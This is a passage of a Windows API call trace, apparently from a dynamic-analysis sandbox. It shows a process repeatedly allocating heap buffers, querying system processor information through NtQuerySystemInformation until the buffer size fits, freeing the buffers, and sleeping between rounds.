NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0298.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0298.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0298.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0298.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0298.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.020] Sleep (dwMilliseconds=0x110) [0298.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0298.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0298.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0298.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0298.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0298.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0298.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0298.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0298.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.035] Sleep (dwMilliseconds=0x110) [0298.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0298.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0298.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0298.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0298.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0298.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0298.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0298.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0298.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.052] Sleep (dwMilliseconds=0x110) [0298.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0298.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0298.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0298.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0298.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0298.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0298.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0298.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0298.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.066] Sleep (dwMilliseconds=0x110) [0298.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0298.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0298.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0298.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0298.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0298.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0298.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0298.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0298.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.081] Sleep (dwMilliseconds=0x110) [0298.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0298.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0298.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0298.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0298.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0298.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0298.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0298.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0298.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.097] Sleep (dwMilliseconds=0x110) [0298.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0298.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0298.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0298.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0298.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0298.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0298.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0298.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0298.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.109] Sleep (dwMilliseconds=0x110) [0298.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0298.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0298.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0298.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0298.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0298.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0298.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0298.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0298.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.125] Sleep (dwMilliseconds=0x110) [0298.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0298.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0298.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0298.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0298.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0298.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0298.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0298.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0298.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.145] Sleep (dwMilliseconds=0x110) [0298.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0298.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0298.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0298.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0298.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0298.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0298.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0298.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0298.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.161] Sleep (dwMilliseconds=0x110) [0298.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0298.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0298.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0298.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0298.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0298.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0298.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0298.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0298.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.176] Sleep (dwMilliseconds=0x110) [0298.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0298.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0298.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0298.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0298.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0298.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0298.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0298.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0298.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.193] Sleep (dwMilliseconds=0x110) [0298.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0298.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0298.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0298.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0298.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0298.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0298.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0298.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0298.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.203] Sleep (dwMilliseconds=0x110) [0298.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0298.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0298.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0298.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0298.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0298.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0298.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0298.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0298.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.222] Sleep (dwMilliseconds=0x110) [0298.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0298.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 